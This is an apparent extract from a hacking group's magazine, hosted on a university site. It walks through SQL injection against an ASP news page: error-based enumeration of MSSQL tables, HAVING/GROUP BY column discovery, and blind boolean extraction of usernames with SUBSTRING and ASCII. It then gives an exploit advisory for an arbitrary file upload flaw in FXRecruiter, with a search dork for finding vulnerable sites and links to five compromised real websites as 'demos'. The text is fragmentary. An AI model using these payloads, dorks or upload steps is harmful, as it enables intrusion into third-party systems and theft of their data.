
Zanjan University of Medical Sciences - zums.ac.ir/files/IT/pages/ashiyane_mag_no4.pdf - Ashiyane...

Date post: 05-Apr-2020

www.ashiyane.org


Ashiyane Digital Security Team


www.site.com/news.asp?id=@@Version

www.site.com/news.asp?id=(Select Name From SysObject Where Xtype=’U’)

Microsoft OLE DB Provider for ODBC Drivers error ‘80004005’

[Microsoft][ODBC SQL Server Driver][SQLServer]Subquery returned more than 1 value. This is not permitted when the subquery follows =, !=, <, <= , >, >= or when the subquery is used as an expression

Select Top 1 Name From SysObjects Where Xtype=’U’

news.asp?id=(Select Top 1 Name From SysObject Where Xtype=’U’ And Name Not In (‘User’))

www.site.com/news.asp?id=2 Having 1=1

Microsoft OLE DB Provider for ODBC Drivers error ‘80040e14’

[Microsoft][ODBC SQL Server Driver][SQLServer]Column ‘dbo.MeetingDetails.id’ is invalid in the select list because it is not contained in an aggregate function and there is no GROUP BY clause.

www.site.com/news.asp?id=2 Group By id Having 1=1

www.site.com/news.asp?id=5 And SubString(@@version,1,1)=5

www.site.com/news.asp?id=5 And 5=5

news.asp?id=5 And (Select SubString(Concat(1,Column-name),1,1) From Table_Name Limit 0,1)=1

<And ascii (SubString((Select Concat(Column_Name) From Table_Name Limit 0,1),1,1))><Char

And ascii (SubString((Select Concat(User_Name) From Users Limit 0,1),1,1)) > 98

news.asp?id=5 And ( Select 1 From Table_Name Limit 0,1)=1

http://cloud.github.com/downloads/easyphp/easyphp/EasyPHP-5.3.6.0-setup.exe

www.wampserver.com/en/

mysql , mssql , oracle , msql , postgresql

=======================================================================
# FXRecruiter Arbitrary File Upload Vulnerability
=======================================================================
# Name: FXRecruiter Arbitrary File Upload Vulnerability
# Vendor: http://www.fxrecruiter.co.uk & http://www.reversedelta.com
# Risk: High
# Date: 2011-03-27
# Author: Ashiyane Digital Security Team
# Contact: XroGuE_p3rsi4n_hack3r[at]Hotmail[Dot]com
# Home: www.Ashiyane.org/forums/
# Gr33tz: Behrooz_Ice,Virangar,And All Ashiyane Members !
==========================================================================
[+] Dork: intext:”Powered by FXRecruiter” & inurl:”page.php?page=*.php”
==========================================================================
[+] Note : You must Register at site, Then in “Upload CV Field” Select and
[-] Upload Your File, then Using “Live Http Header” Change ur File Format To Etc ...
[+] Uploaded path: http://127.0.0.1/fxmodules/resumes/[Your File].*
[+] Demo1: http://www.resourcing-solutions.com/fxmodules/resumes/haha_ehehe.html
[+] Demo2: http://www.energyintoenergy.com/fxmodules/resumes/p3rsi4n_hack3r_xrogue1.html
[+] Demo3: http://peoplemarketing.co.uk/fxmodules/resumes/black_xrogue.html
[+] Demo4: http://www.charles-hunter.com/fxmodules/resumes/black_hat_xrogue.html
[+] Demo5: http://www.activesolutionsrecruitment.com/fxmodules/resumes/black_hat_xrogue.html
==========================================================================
# Why I Put 5 Demo Site ????
* For Some People That Think my Report’s Is Fake or not AVAILABLE At Net... !!! :-l
$ Need Live Video ??? : ~>
Video : http://www.vimeo.com/21464321
Video http://www.4shared.com/file/AIwSyKn-/FXRecruiter_Arbitary_File_Uplo.html
==========================================================================
[+] Dedicated to the Ashiyane guys, Happy New Year... I hope you have a good year !
[+] Discovered By XroGuE !!!

BUG

Zone-H

http://zone-h.org/stats/notifierspecial
